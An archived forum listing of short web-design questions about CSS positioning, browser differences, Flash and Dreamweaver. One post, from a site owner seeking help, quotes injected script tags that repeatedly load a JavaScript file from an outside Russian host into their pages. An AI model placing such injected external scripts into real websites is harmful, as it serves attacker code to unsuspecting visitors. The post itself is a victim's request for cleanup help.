7,985 Archived Topics
Remove Filter ![]() | |
I recently saw a Danish website that I like (I like the design). [url]http://www.niels-burcharth.dk/default.asp[/url] Then I found out that it does not work in Mozilla Firefox because the HTML is so badly written (it is not a CSS problem). In the main navigation bar, TD parts of a table are … UI / UX Design html-css web-design | |
is it possible to get flash to play x amount of frames before completing the gotoAndPlay from a button click. UI / UX Design flash multimedia web-design | |
I have seen websites where an arrangement of several photos is displayed. The user can see an enlarged photo by clicking or mouseover a small photo. The larger photo is displayed on the same page at the side of the arrangement of the smaller photos or in some other place … UI / UX Design multimedia web-design | |
I’ve searched the net with no answer. Let’s say I create a Template for a page called (test), and I want this page to show anything I write in the page area in the content (like it actually works) but after that I would like it to show the post … UI / UX Design web-design | |
What HTML tag can i make use of inorder to make a text blink. Thanks UI / UX Design web-design | |
Sir I have created one website When i hosted in server automatically adds malware, when viewing source code following lines are automatically added <script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script> How to get out of this malware line from my website.If i remove those lines and upload also again … UI / UX Design web-design | |
I just started web designing, and I'm still quite new to Dreamweaver CS3. Here's my problem, I want to have a banner positioned right at the top of the page, but there's a gap there when I added a table. I tried using a template, but I'm not able to … UI / UX Design ui-ux web-design | |
Does anyone know if I can head directly for XHTML without learning HTML? Is there a difference? UI / UX Design web-design | |
hello could someone help me with div position This is code: [code=html] <th width="200" scope="col" bgcolor="#666666""> <div class="css" id="myOtherElement"> <span><strong>Menu</strong></span> <div> <a href="#">Menuelement 1</a> <a href="#">Menuelement 2</a> <a href="#">Menuelement 3</a> </div> </div> </th> [/code] css code: [code=css] .css{ position:absolute; left:0px; top:0px; z-index:-1 }[/code] the problem is when i set its … UI / UX Design html-css javascript web-design | |
Could someone please help me? I can't figure out why this site is giving a horizontal scrollbar at lower resolutions? All of my tables use percentage widths instead of absolute?? It would be great if someone could take a looksie at the html and see if they could figure it … UI / UX Design web-design | |
Hello, I am having problems displaying a background image in ie. In firefox it looks perfect, but in ie I am having problems displaying the image, it doesn't display at all. Here is my code: [CODE] <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="120" colspan="8" valign="bottom"> <img src="https://www.rejoovme.com/images/wrapperHEAD_916.gif" alt="RejoovMe Relaxation Center" … UI / UX Design web-design | |
Hi all, Iv created the following .jpg [url]http://fc02.deviantart.com/fs32/f/2008/234/a/b/testersss_by_kyllle.jpg[/url] which Im trying to replicate using html & css, Iv tried to poition the buttons etc at the top but having trouble inserting the text below the sub vavigation and also having trouble making the left navigation appear one below the other … UI / UX Design html-css web-design | |
Have a nice Day, i tried to use vertical-align property of css in one of my project, but it did not work at all. can anybody tell me how can we use this property properly or any other alternative technique. thanks in advance UI / UX Design html-css web-design | |
![]() | [B]Layers Issue[/B] Site URL: [URL="http://www.further-flight.co.uk/20080820index.php"]http://www.further-flight.co.uk/20080820index.php[/URL] I am attempting to position the banner text over the top of the black space next to the racing image, but the z-index css is not having the right affect. Would someone be able to advise where I am going wrong with this, please? CSS … UI / UX Design web-design |
Hi guys I was wondering how I create the following little search for my site, I can code the form but I need to get it looking like this [url]http://fc02.deviantart.com/fs32/f/20..._by_kyllle.jpg[/url] many thanks Kyle UI / UX Design web-design | |
[B]Yes, I'm new to Daniweb. I joined because I knew that this would probably the most active web design forum on the web. ^-^ But this isn't the place for introducing, is it? xP Okay, to the question. I need to know how to Iframe my site, but I want … UI / UX Design web-design | |
actually am an fresher trying to create a website for cricket game based on real time entries.its basically in php and has a database. please help me if u have ever made such site. UI / UX Design gaming web-design | |
I don't know if it's possible to upload Youtube videos to my blog in blogger itself, it would take up a lot of space and time anyway. Is there any timesaving and easy process to do? Thanks in advanced. UI / UX Design multimedia web-design | |
Does anyone happen to know if it is possible to create a layout that will allow me to have a fixed width left column and fluid right/content column? The really tricky thing, is that I'm in a CMS. I cannot add inner/outer divs to contain the modules. I have to … UI / UX Design cms html-css javascript web-design | |
Hi Everybody, I am new to this forum and quite inexperienced when it comes to HTML coding. I want to put the Dropdown HTML control menu ([url]http://www.dynamicdrive.com/dynamicindex1/dropdowncontrol.htm[/url]) on my website, but am not sure if I can do that since my hosting package doesn't allow me to use php on … UI / UX Design php web-design | |
![]() | [URL="http://www.further-flight.co.uk/20080820index.php"]http://www.further-flight.co.uk/20080820index.php[/URL] How would I rid this design of the white space at the top and sides of the page? My code is set out as below: HTML [CODE] <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Further Flight</title> <link rel="stylesheet" … UI / UX Design html-css web-design xml |
Hello all, I have a problem that I hope some one can assist me with. I have a site done in html and css that also has swf files embedded. It works great on Internet Explorer, but Firefox is another story. The swf file is a page flipper and in … UI / UX Design html-css web-design | |
Hey everybody! I’m kind of looking for the best platform for digital art and not that high-tech Robotech thing everyone thinks of when high-tech is mentioned. I’m talking about using the digital technology to create stuff like Van Gogh, probably some Monet, the main thing here is not only to … UI / UX Design multimedia web-design | |
Flash Error: [code] Source: imageArea.addChild(imageLoader); Description: 1120: Access of undefined property imageArea. [/code] I was following this simple tutorial: [url]http://www.kirupa.com/developer/flashcs3/loading_image_as3_pg1.htm[/url] Any help will be much appericated. Thankyou, Regards X UI / UX Design flash multimedia web-design | |
I am developing website for the company delivering wesite content writing and SEO copywriting services. What header design would you recommend me to use? UI / UX Design multimedia seo web-design | |
I am not a computer or website guru. I know a little HTML. That's all. I just wrote a book, Radolescents, and created a website for it on tripod.com using their site builder. The name, [url]www.radolescents.com[/url] is registered with GoDaddy and forwarded to the tripod site. The true home page … UI / UX Design ui-ux web-design | |
Hi All, I am using DreamWeaver 7. My Screen resolultion is set to 1024x768. I want to design the webpage for 1024x768. What dimension in terms of pixel units, should i take in the ruler setting in the Dreamweaver? Thanks in advance. UI / UX Design ui-ux web-design | |
So I've attempted to make a very simple page using a table-less method, but I've run into a problem. On IE it shows up as one whole peice with nothing obviously wrong. On FF I get a space between every div about 5-10px in height and can't seem to find … UI / UX Design html-css web-design | |
Hey Guys...I think this is the best forum for this question so here goes... If you have ever sold anything on ebay, you know that your description code is displayed along with the ebay website code. Ebay does NOT use an IFRAME to display your add. Yet, when you view … UI / UX Design html-css web-design | |
![]() | Hi, I'm not too good with CSS but I managed to create a menu list that I like. It works exactly how I want with IE 6.0, but overlaps with Netscape and FF. Can anyone help me figure out why? Here is the CSS: [code] #left-menu { background-color: #181C3A; border-bottom-width: … UI / UX Design html-css web-design |
If this is found somewhere else, I'm sorry for bring it back up, I just could not find it anywhere. My problem is that I have a webpage that is setup using <div> and is designed at 1024. I recently had someone tell me that it does not look good … UI / UX Design ui-ux web-design | |
Could someone describe the elements of my class especially items associated with [code] //private var contentMC:SomeClass=null; [/code] I would like to stop the animation when the player opens and I think I have the concepts confused. How would I set the .fla up to do so. Thanks -Steve UI / UX Design multimedia web-design | |
hi all, i have a website in which i have used button as a image and wen i give link to dat image button its color is changing i used dreamweaver help but didnt work i will [CODE]<td width="58" height="40" align="right" valign="middle"><a href="index7.html"> <img src="images/Home_2.jpg"/></a> </td>[/CODE] i want color as … UI / UX Design web-design | |
Does anyone know if I can head directly for XHTML without learning HTML? Is there a difference? UI / UX Design web-design | |
| |
I want to create a walking and talking cookie. Anyone out there has an idea of what I should use to create that crispy “chips-ahoy-like” texture? UI / UX Design multimedia web-design | |
i have the CS3 master collection... dont ask how i got it... but i am very experienced with computers... but web design and development is where i lack the most... if anyone could direct me to some tutorials (i cant find any) for dreamweaver CS3 and flash CS3 or it … UI / UX Design flash web-design | |
Hello. I have a table with 1 cell and 1 row and in it I have a name and comment section with a submit button and reset button. To the right I have an IFrame that is linked with a .cgi file displaying all the posted comments and it does … UI / UX Design html-css web-design | |
i am trying to use span option to place an image: [CODE=jsp] <SPAN style="position: absolute; top: 220px; left: 371px; width: 320px; height: 320px"> <IMG SRC="t3.JPG" > </SPAN>[/CODE] the problem that this image is hiding other images. is there a way to make this image "behind" other images except painting them … UI / UX Design image web-design | |
Haha well thay isn't a typo. While going through my problem i find a lot of cases where IE is the meanie. Well for me, FF is the bully. I been coding this site for quite a while but i have a huge problem. There is a whitespace between the … UI / UX Design html-css web-design | |
Hi, I print a HTML table with background colour but, it doesn't print it with colours. Why? Thanks UI / UX Design html-css web-design | |
Hey all, a quick question, i was wondering if someone could provide me with a tutorial or help on how to create a footer that stretches the whole way across the webpage at 50px or so height and has the links centered on the page with font size 12px with … UI / UX Design html-css web-design | |
So yeah my history page is going to be pretty long and would be nice to have a scrollbar in the text bar. But i want to be my own. How can i do it? Java..css..how?? UI / UX Design web-design | |
I'm trying to figure out the best way to do something. I'd like to use HTML/CSS. I'd prefer not to use flash as a lot of people dont have it installed. I'd like it to work cross browser. I'd like to have an image of an old school Drive-In movie … UI / UX Design flash html-css image web-design | |
hey , will anybody sugest me how an i use comman CSS to webpage basically i want to use this for [URL="http://www.nikeshyadav.com/"]http://www.nikeshyadav.com/[/URL] i m using is [code]<?php if (eregi("MSIE",$_SERVER['HTTP_USER_AGENT'])) echo '<link href="css/iestyle.css" rel="stylesheet" type="text/css" />'; else echo '<link href="css/otherstyle.css" rel="stylesheet" type="text/css" />'; ?>[/code] but it is not a good way … UI / UX Design html-css web-design | |
At the moment I have a button, and on the mouse over a move clip is loaded. I would like to do the same on mouse out, but there is no frame button for mouse out, so what can I do? THankyou, Regards X UI / UX Design flash multimedia web-design | |
I'm searching for a better way for this : I have several maps to display so I use a GPX file per map of course and also one HTML file per map; the HTML file invokes a .js routine which displays the GPX in google Maps. The "issue" is that … UI / UX Design file-system html-css web-design | |
Alright, so I am a graphics designer and I am putting an art portfolio together for college, I decided to make a website portfolio, so heres the site [url]http://www.reddragonsyde.com[/url] As you can see none of the links work, and the images spaces are blank because I am clueless on how … UI / UX Design web-design | |
Hi , i am being develop site that using Drupal. And try to edit the list to be without bullet. I have try with select the class or id and create the properties in css but getting failed. Please, give me know to do that ? [B]This is the codes … UI / UX Design html-css web-design | |
I have a page that loads a text box and an image the user has selected from another page. I can get them to display but I need to be able to have the image fit under the text. Right now the image is over the text. I have a … UI / UX Design html-css javascript web-design |
The End.